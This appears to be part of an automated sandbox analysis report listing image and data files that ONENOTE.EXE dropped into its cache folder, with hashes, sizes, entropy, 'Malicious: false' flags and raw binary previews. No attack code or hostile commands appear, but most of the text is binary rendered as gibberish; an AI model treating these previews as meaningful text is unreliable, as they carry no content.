SSDEEP:	192:YyroOCsBI9pkCFsHHX2RE6VOlPuIqmBtJNBfAr+ADP1IATaNeTyZ4GF+WQQ6Qwq2:BUOCsB2kCGH32RiPDtDBfArPDP1I/eyM
MD5:	8E9AB9C28B155A66BC5C0DA5E2A4EFB5
SHA1:	972E61F162D48F1CEE21963ECBB2FE439105DB55
SHA-256:	B243A24FA13BC8523450E22F408F9EFF15301C938F8CA52A57018B58CE6785DE
SHA-512:	12062D69E676B3B34AFCEF25AC17B40294282D5BAB6C0110680293D7CC96EC17EBCFE104C284E64A30EE3C483E319E9C37C03F6EE82C79632180E45C7A684E8C
Malicious:	false
Preview:	.PNG........IHDR..............`....`PLTE............................................................................................... .......bKGD....H....cmPPJCmp0712....H.s...*YIDATx^.]...,.N.8.i......0..e..y.......8.6....Fo.........=...F..._..........O..{..............3.\|.L.\|.............>.....v..n.1J...k...."....7........J._.5LQ`..k...._Z.W.x:..k...g..._.....u<.Q{...1...q6.cs...l............30.g...< W...a.5..>O....9}..c..........s\|I.).>.fo4.<q......>...c.:.u..co.#.7,.O..G./.K.\|..q.p...(.(....iH.......m..+.7...../..{W.l....b....?.`^.q.9L&.>.hN2`1..m...]$.0J....rBy......{.._...G....;.r.Q..;..,...9..F...t;.+..2.Ub......V...8.k..5.........'[..s.H..).......%j._.&.....BN..V..q...T...#..........0.E&.o7....$..m..8g.f._$..k.8...5......HgQ...L..\.........)B.I.r.(..8.a..$N.9.=..o..Q..(.e.a..O.....c.= .......$0..X.S,..(p......$..l.c.I...=."......g....^..#~,&.a9iK..ZNE`...pFJ.@Wd?.<..Bt.E.......e...i.%d...}.!..B......9.........B}.....5...;..hL.D.....4z.....\|.)

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006A.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.338346961244697
Encrypted:	false
SSDEEP:	48:ksBmxRMzatqpJEQLaXU9z0oNrdqr2koRXfrmQm59umRZOm/mQmCim5mW:ks8xGza+JEQuXU9z0cRykgL1RD+LC9g
MD5:	426AB0851DC4AFD83F187E1980DCB370
SHA1:	5E8BA69993F2B49AC810CC5C7CDF2839FEF5A046
SHA-256:	A9A546B033318C70B65C15E74CF0DE9F9C37C3AF248D3BF3E1DDE98C63FEC58D
SHA-512:	EC52253C7F220A066E97DA8172DB3E65F92700383D8B115B1A62E7635DCF0A17001F5B01A9195C62008E3D85FB35FE1F5BACB7EB7A23DC0EDD4890D1EB8A7B92
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZU.e.....U.ey.!_.,n.....5U.ey.!_.,n.....5U.e..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............B.."....f"..>......N...^................$?.`..D.(..f.f.........f........................................I.qk..B.....LZ.............B.."....f"..>...........B.."....f"..>...........U.e.....U.e.....U.e.........................................U.ej....U.eT.]..U.e.....U.e..B..U.eH....U.e..B..U.e..>.)U.e..J...................;........4...4...4.."..............U.e.U.e.U.e..z...y.. x.. ...........$........4.....7..7........................;........4...4...4.........U.e.....U.e....#U.e............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006B.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 650, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	647
Entropy (8bit):	6.854433034679255
Encrypted:	false
SSDEEP:	12:6v/71rwqZMXVs99W1YvpLp/Fvl+f43ocLtuplb+CrGotLRd:+wqWXVs99rpLpNvr3pIx3b
MD5:	DD876AA103BEC3AC83C769D768AD39FB
SHA1:	1833603AA9B6A7E53F9AD8A336F96CCE33088234
SHA-256:	1262DD23AD54E935CFA10FEB1BE56648E43BEF1116696CA71D87E6E033B1CA7D
SHA-512:	946DB2277213104A3B29EC4388578B05027B974A3093B4CCAD8847397AA51AE308BC6A199E5705E1F901D6E4B1BA34D8DECFD6E5B6685184A307D749D7CFAEDD
Malicious:	false
Preview:	.PNG........IHDR...(.........xk....`PLTE.........................................................................................>.S.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.)..1..7w....6.*.H`T6.ha.k.............b!....Ba..C..P.4K..@.....h.E..X....PX+.P.-.....@@"...o.O4....xZ<...B...B..,A..y.s<......b!....Ba..C..0_p. .......=..,...i. ...=.j..N...........{4+...xZ<...B....\|.....$.K<.vyE..X....PX+.P.-.:... .'p......\,...i. ...=.j........K.....%J..S+.....q..k.H.@DD.s...:..J.K.DDL.\.@`,.DD.:.(]..N....KD....A M.....F..S+.....1.sq........\.t..;..../...~k...4.DD.:..]..N....KD........@DD.s...:..J.K..[...Q....V......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006C.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.342730320759416
Encrypted:	false
SSDEEP:	96:6scyCfTp/EjFQtKXxEK97gERyKP2jy7I:6s8f1sxQtKXxEK97gERyKP2j
MD5:	C234E1790946CDEC08DC25329FD07D24
SHA1:	E9FB63911A7EE2131011AA92746CB81FBC5A4A7E
SHA-256:	2E86087A09C388FF6C48BE62FB9C7B2C4E4B4F061C914C2BCB45A876FC73B8F8
SHA-512:	3F3F39C7E6375C04836F1112379CDCE4636326305C4EC785A470709B8D24280C8753E160385506388435840F1075A3DD65A71F0F41EC2B08CBE89AC8D9C6A2D6
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZ..r.......r$.%%."Fus.\|J9..r$.%%."Fus.\|J9..r..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'............. ..yE..=\!.,.......N...^...................`.MH...w............f........................................I.qk..B.....LZ............ ..yE..=\!.,........... ..yE..=\!.,..............r.......r.......r...........................................rj......rT.]....r.......r..B....rH......r..B....r..>.)..r..J...................;........4...4...4.."................r...r...r..z...y.. x.. ...........$........4.....7..7........................;........4...4...4...........r.......r....#..r............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006D.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3
Category:	dropped
Size (bytes):	52912
Entropy (8bit):	7.679147474806877
Encrypted:	false
SSDEEP:	1536:DB/nIviNJD9C8kfJj6TkVr4q24FsUpjPc021si:DdnIvi3D9C8Cl6Dq24ayPCz
MD5:	1122BF4C2A42B4FA7F29D3C94954A7C9
SHA1:	3750077A830FE21735A43ABD35C63BA9A4D4B0DE
SHA-256:	423B0DD1A93B391D15B1DC8D8757C3BF5725FF2E7A59E6E3140033E2876B67F6
SHA-512:	4626EFE2EDED2361D6296B57F994DC434CC9D02357A8A6A67D84A544FB8A1CFE0005EA98F846AB963BED7F2B6CE96BC9181182C9459843A52A98D3A731A4FE73
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:27:10............................f.........................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....]+\.9.9.P.d..Z.?~>.-...]6=...........S.9G...b<$..Z..........>.v.o:.o%.e...z.F`...[.wo..z.....k..E...5....G..7.......c2..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006E.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.3323383121672805
Encrypted:	false
SSDEEP:	48:2yJ2sI8jzEvSoqrth/EkY9BXn9rwodrdqrbiRXlxO6/pUCua:2yJ2s9MSoqrrEk6Xn9rw0RyOtB
MD5:	E9449EDCC7227C000F1528EAABFE222A
SHA1:	BA668BB6194124F143FBF662F3687C239829AA2B
SHA-256:	5C8291EDEF13C3E5AB7F6B9B10E46C5C6D4680E413FAF1999E4C2E0F029209E6
SHA-512:	E4FFE377C63CE53B12E4A5FE46F8EAB878104434F6605D5AB5892E531657F42F160CA0680561FB421CDEAB7C36F6291024C28C31E626953C3DDE67F1AD39D819
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v............................I.......I.qk..B.....LZ.........ii....E.F!%....ii....E.F!%......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............x(..:-F....fU.......N...^...............2..Vx.LB....[@.\........f........................................I.qk..B.....LZ............x(..:-F....fU...........x(..:-F....fU.......................................................................j......T.].............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4.....7..7........................;........4...4...4......................#..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006F.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
Category:	dropped
Size (bytes):	27862
Entropy (8bit):	7.238903610770013
Encrypted:	false
SSDEEP:	384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
MD5:	E62F2908FA5F7189ED8EEBD413928DEE
SHA1:	CA249B4A70924B73BDA52972E9C735AEC35A0C5D
SHA-256:	20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
SHA-512:	EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..\|.Q..I.&.. ......"T4)wdH.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006G.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.469616614841069
Encrypted:	false
SSDEEP:	48:WsGbKu0sMtQH5mewLE5z5LOXsO58O9Ftioxrdqrf+KRXD/xyN33t:Ws3u0NmwLE5tLOXs5O9FtiQRyhw
MD5:	42214D56AFDE25D39D008386696F7637
SHA1:	2EFEE8A1231C24314B225379BD6061CB08E37CB9
SHA-256:	CCB6DAE04F0B108DD2D4011C16E95A1FE9CBCEEA8F8E147DE5F3454C0C88E92D
SHA-512:	5081352CC4811A77A32E29D8035F9B7E7E199A2EBDED8A68937EE864786F190B5B036FD1B0B3DF8D14A458AC121093B38642403CDF81B8972795FE42F34236DF
Malicious:	false
Preview:	2...>.......r...v...f...................................................................................................................................2...>...N.......v...............................`.......`...8... .M.M...I.......I.qk..B.....LZ`...8... .M.M..`....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............Y..0....B..Y.{.....N...^................k...pA.T.!.I..........f..................................."....I.qk..B.....LZ............Y..0....B..Y.{.........Y..0....B..Y.{..........`.......`.......`...........................................`..j....`..T.]..`.......`....B..`..H....`....B..`....>.)`....J...................;........4...4...4.."..............`...`...`....z...y.. x.. ...........$........4.....7..7........................;........4...4...4.........`.......`......#`..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006H.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 556, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	977
Entropy (8bit):	7.231269197132181
Encrypted:	false
SSDEEP:	12:6v/7QiFJaY/z+obuqFA4fypjQSbtBK+lcqNGSbb7XTJArRRzN5DjNRkPmu5cCbR2:x0QY7xbjy9pY0JPXLTWroeuCCbX0
MD5:	B7F74C18002A81A578A4EE60C407A8D3
SHA1:	70A7D4BB1B3ADF4397D168AD0D81B286F88EBDE0
SHA-256:	95F59A0433050180D4C0E8858B83363D51BEA6752A8B7CA516A8677854D8F5B6
SHA-512:	13186A7CDCE80BCA9D2238666D6D7A989FA1887EABFA5D8A9A63EEC304DFD4BE8EFF652205FA56E1D1CEE7D3680AF8C70A952AF73AB3C246400E8D4EBECBDBA9
Malicious:	false
Preview:	.PNG........IHDR...2...,........A....PLTE...................................................................................................................................................................................$.y.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^...0.D_.......cck.....%a...X.a0Y...-..!.G...[....(.r.H.$...1 .zq.4V.e\|a.6.X..4..kl.%....=w....6..TN.....{.4..T/.z...../.....3..!~..t.#b..^.....E!.SFb ...-.....^...,..C.!.b...i._c...s.X.w.. lsQH..H.gKc@@...i. ....m...;Ci....@G.; V{..lO..\.R9e$..{.....P...E.+.2.0D.B,..P...56.?......K.6..TN....^z.4..T/.z...../.....3..!~..t.]b........E!.SFb ...-.....^...,..C.!.b...i._c..Y.O...?.9k2.M.?5 .n.P...,...d._..%M?....6....,.1..R.4.a.R.+..U.Q..P...vd..T........j .]@....."..lJ../.90.4...Y. ...9.%...{......Hc%.....i..%M?aG..H....o.q.......4.......X.d9.r..CI.O.5.Ri0?.s\b....w...>/k..4V.)Y....P...vd..T........j .]@....."..lJ../.90..2..MP..l..?....K.X.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006I.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.30801432437092
Encrypted:	false
SSDEEP:	96:HIsDiA3gBGBVNFBE3TOhXQ249jt16RyYFZA319prol:osgGBhejOhX749jt16Ryq
MD5:	612943DEB6CCB1A2DD8EF6E6202BD3D5
SHA1:	EFD1F68FF7A9A6E628F235B1F7851D0854BEC55F
SHA-256:	936162F87D341C9F9E5528D1127448557F0CE8A198113489397FF1C7DEF8413F
SHA-512:	A249EFEAE393F5A397F6DB71586514BFC657C5975492F8AED2AE371769B775B7AF3ABF90374BCB7F11D50EEDF7D1385ED92FB7F0E1CC5AE1CF2759F9C20DC7E7
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ..N.......N.aND...e0...D..N.aND...e0...D..N..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............f..$.l....:R.f.....N...^................`...xI.X...?..........f........................................I.qk..B.....LZ............f..$.l....:R.f.........f..$.l....:R.f............N.......N.......N...........................................Nj......NT.]....N.......N..B....NH......N..B....N..>.)..N..J...................;........4...4...4.."................N...N...N..z...y.. x.. ...........$........4.....7..7........................;........4...4...4...........N.......N....#..N............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006J.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	34299
Entropy (8bit):	7.247541176493898
Encrypted:	false
SSDEEP:	768:BrSX4V3P8AIc4KLkHeXRUer0zrhOmXfvG0yH82I:tSXuIc4K2eBtswKsHg
MD5:	E9C52A7381075E4EBC59296F96C79399
SHA1:	BE295AD24D46E2420D7163642B658BF3234A27EA
SHA-256:	D56CEFE9EE2FAE72E31BDBA7DD2AA4426EA22E3CEB22EF68C8F63F9F24D5A8BC
SHA-512:	95CC96DD4459EBAE623176033BA204CCDC50681A768F8CBAE94C16927D140224E49D5197CAE669C83C77010C5C04C1346CF126BEF49DB686F636C5480342A77F
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.......................................................................................!.1..A..Qaq......".#4.2r3.$.%...B.5U&6....Rb.Cs.7..cDTEFVf'...S..dtevw.u.........Gg.....................!1..AQ.aq.2....."#3.4....r..BRb$CS.D............?..5..............#....v.q.m.}\..{....;...r....h.....J..q\|..'.;\..6..v......e...../.k..\|.8..i..\|..]..3e.m....n..Z.GS..n".y..w.-...[a...7A.....i.4.)9\..~C...=.........s..\V]c.D1<./.g.l.&v..~.h..]....zb>G..y:vNS.\......LU....t.{*..Z#.?..v-...wn.rR...P.....y\=.v....../..9_...m4...V.\|.+.o.#.......xj....}..>.s.>C...m.[;.>.p...=^.i.X.(..1...{.F#N.W...xi.z...4..u[{...yO.....8..}\..2...KlX.nbya...2.&.F...R.b.k.7.GV.x.h.y\.Q..O<\>......-...=...r......\......Z.Z...Jf.'....z..Y.q>.p....o..K....h..R..c.lg?......A.Z...Y.q3.L\|.'5...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006K.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.337802558282347
Encrypted:	false
SSDEEP:	96:yszdxgfJ56zNEyFOXgWN9jS8RykiMQgYgXPzv1nkoQgKVI/:ysp6J5DkOXT9jS8RyrM3nJko3WI/
MD5:	514CE945F296E84E35CD02753DEEC812
SHA1:	6BBE090B0F7040127D3A70419E447FE1AD94A525
SHA-256:	DF3460731C6891457F39FFFE4CAC938BC4C0391C04EF326D376D2100D550EBFD
SHA-512:	19173CE2163FC7C5BD8027F9518B16DB8E179FDD2A0145242561E598B795A8280DBC0CDBFB2DE883AA75850069D3A32B5EE8A803029D27AFCC924518FDA0E3BD
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v............................I.......I.qk..B.....LZh.......h....s../.TT?lX,h....s../.TT?lX,h....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............:..V...'....'P....N...^...............IT/..5.F..A...........f........................................I.qk..B.....LZ.............:..V...'....'P.........:..V...'....'P.........h.......h.......h...........................................h..j....h..T.]..h.......h....B..h..H....h....B..h....>.)h....J...................;........4...4...4.."..............h...h...h....z...y.. x.. ...........$........4.....7*..7........................;........4...4...4.........h.......h......#h..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006L.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 552, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	10056
Entropy (8bit):	7.956064700093514
Encrypted:	false
SSDEEP:	192:edmu1fpj5DVHuooK4EpGLbAdT+dBXYBR8D1V2p6KwoPR6KUX9ojwRpgA:2Pp/B4LbAF+dBo/1E3S6JScpgA
MD5:	E1B57A8851177DD25DC05B50B904656A
SHA1:	96D2E31A325322F2720722973814D2CAED23D546
SHA-256:	2035407A0540E1C4F7934DB08BA4ADD750FCB9A62863DDD9553E7871C81A99E3
SHA-512:	BC7DC1201884E6DAFDC1F9D8E32656BFAEE0BB4905835E09B65299FE2D7C064B27EAA10B531F9BECF970C986E89A5FD8A0B83F508BBA34EB4E38B3F7F5FC623A
Malicious:	false
Preview:	.PNG........IHDR.......(.....!..t....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................4.....bKGD....H....cmPPJCmp0712....H.s...#.IDATx^.w`......$..B....... ....fz5..6`l\.8...Nsz{.//y./....{.7}g.....e.....~.......s...f.....%c...6....O.PJ...Y.oi...9..'j.2..6.-

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006M.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.341269778962605
Encrypted:	false
SSDEEP:	96:07sFP9CeLEaBEfiFXfz9/xcRyQb49mH+kRHY:07sFP9CebefiFXfz9/xcRyK49mH+kR
MD5:	2879C8EC1FE54C09B6229A6726751BF3
SHA1:	1E574740B98D3A1CA2ECA66953FBBFCECBDF18EA
SHA-256:	DEA705D271074036B2AC0FC9C3A872DE0EEADD6BFA7DDE72079F9A97AA985921
SHA-512:	D40ACC0B90E09DD09A2B043B365454337B0E8DD266E3AAC3696C1BA9E1CDF6A8919032D0334DA716F7A55932D7956CB6DEAAE21ED0E22595D6A9F203925B71D8
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v............................I.......I.qk..B.....LZ...........24h..9..Q.t....24h..9..Q.t......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................Kc..8K.-uj.....N...^................W.y.^K....,O.........f........................................I.qk..B.....LZ................Kc..8K.-uj.............Kc..8K.-uj.........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4.....7*..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006N.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3
Category:	dropped
Size (bytes):	84097
Entropy (8bit):	7.78862495530604
Encrypted:	false
SSDEEP:	1536:cgHTEuD99rHwA5MSadIV2MApVmfJkAKOQ/Z1I7ngpDDyHfKFVITrU:HHjXidIhApV88/jIEmrU
MD5:	37EED97290E8ECB46A576C84F0810568
SHA1:	18D9FACB4CFA3CBF63B882CABCF30B203EDF4126
SHA-256:	140DD943D0F0CFE6AAA98470B7D1A7CB62CA02CB1D8F522DD2AC77433232EF41
SHA-512:	E0F57314C136211B8253EB2AC0093DED82198E7170D4F97C40D82FD4EC4123D2AAFE3EB4EBC3E7523C4DF4D77619408773871BDE15B6DC6C4049C71D5B9D4222
Malicious:	false
Preview:	......JFIF.....H.H.....hExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:11:38.............................A.......................................................&.(.................................2.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................z.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....b.xH......T..I...S.q.~..../s.R.x.....8.a..vE.5...-.G.A.4...._......$K..d.@NC.q....J.....>e".I.%...I0).R.I$........M3.F .

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006O.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.342103944429663
Encrypted:	false
SSDEEP:	96:TsWFKcxm5wEFXlx9D/tURyNlbI8bV8bKJ4:TsWFKcxmXFXz9rtURyNlbI8bV8bY4
MD5:	5826622D89A7100A37C14B700CDFEB59
SHA1:	2D5B5480809692D5B00D193387DFC67E5C9DB854
SHA-256:	248E4BA168DEFD6BA4A859981D5D31395642E28DE0A95552A50B372266C0CADB
SHA-512:	D8B5491A1B419C42C03B0BBA7090EC665D05393E3C5D3C2F8882938259F92B8223DD18871264847430403D3EC8A02F87761B38E1C3E653653AEB62D1C81C4601
Malicious:	false
Preview:	2...>.......L...v...@...................................................................................................................................2...>...(.......v...t............................I.......I.qk..B.....LZ\|.......\|..........c.d.\|..........c.d.\|....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................P.....aZ...r....N...^................{8d.4.I.`#t,hu.........f........................................I.qk..B.....LZ...............P.....aZ...r...........P.....aZ...r.........\|.......\|.......\|...........................................\|..j....\|..T.]..\|.......\|...B..\|..H....\|....B..\|....>.)\|....J...................;........4...4...4.."..............\|...\|...\|....z...y.. x.. ...........$........4.....7..7........................;........4...4...4.........\|.......\|......#\|..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006P.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3
Category:	dropped
Size (bytes):	64118
Entropy (8bit):	7.742974333356952
Encrypted:	false
SSDEEP:	1536:ORG4azGOKXzkEmR4bdRSbxONOoz0khbSb4J/5GZK5SWUlRwUYdv1M:ZXzGXzJdhRmgHfIb4J/5GZK5SWUldYdq
MD5:	864EEA0336F8628AE4A1ED46D4406807
SHA1:	CFCD7A751DFDBE52A20C03EE0C60FDFFA7A45B93
SHA-256:	7CE10D1EA660D2F9CF8B704F3FAB2966A4CE2627D9858D32C75D857095012098
SHA-512:	0CAA0C54C14571C279A75F0D5922F78A17803CF6EE1724D66819F7F5944C0F5B25CB586BB686A52808CDF2F8FEB3E4864052A914884054EF7DE44124A8CA951E
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:26:15.....................................................................................(.....................&...........s.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................#.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....NC+n....<.=.7..&.8A56..@^.Q..\\...E.>..".&G.......J .'....$.I)........0.../..mv...D....<v0=..ugc+..l.o...=.c.......x.&D..{`8...v

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006Q.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.363588677494053
Encrypted:	false
SSDEEP:	48:2sN1mGPZ/0pt+WaEpoX395dvo1rdqrvCFF7RXW9dGsWe3d:2s9Z/0pmE6X39XvcRyvQq3
MD5:	D0F3F7B8B5C060520447E6510A969482
SHA1:	C9DBEA2349562FCA079B78F1D72378511B222EBC
SHA-256:	43C7E37BF4E0073C91F9AA3BCB5F5353A7D573DFB7992C3EEA442A0060A4DCB2
SHA-512:	3E8E8BDB11CC7E759AAFFBB67D9A5E6198553E925475CD50766CD1C7C6CE35C49B9D55C4C5F729DA57162C5DFCA613685CA91ED9329EAE8B3A10077DB2DF8AD6
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v............................I.......I.qk..B.....LZ............\|.....;...[....\|.....;...[.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............#..x...\9........N...^...............#..:+/?B....Q:i.........f........................................I.qk..B.....LZ..............#..x...\9..............#..x...\9............................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4.....7..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006R.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3
Category:	dropped
Size (bytes):	65998
Entropy (8bit):	7.671031449942883
Encrypted:	false
SSDEEP:	1536:klZtmExaFrtWgpc+Sg+DKeplHClpHfRtPMbe:VEWWl+SNDKqlH8p/vse
MD5:	B4F0A040890EE6F61EF8D9E094893C9C
SHA1:	303BCBA1D777B03BFD99CC01A48E0BB493C93E04
SHA-256:	1F81DDE3B42F23F0666D92EBF14D62893B31B39D72C07AEE070EAE28C2E6980E
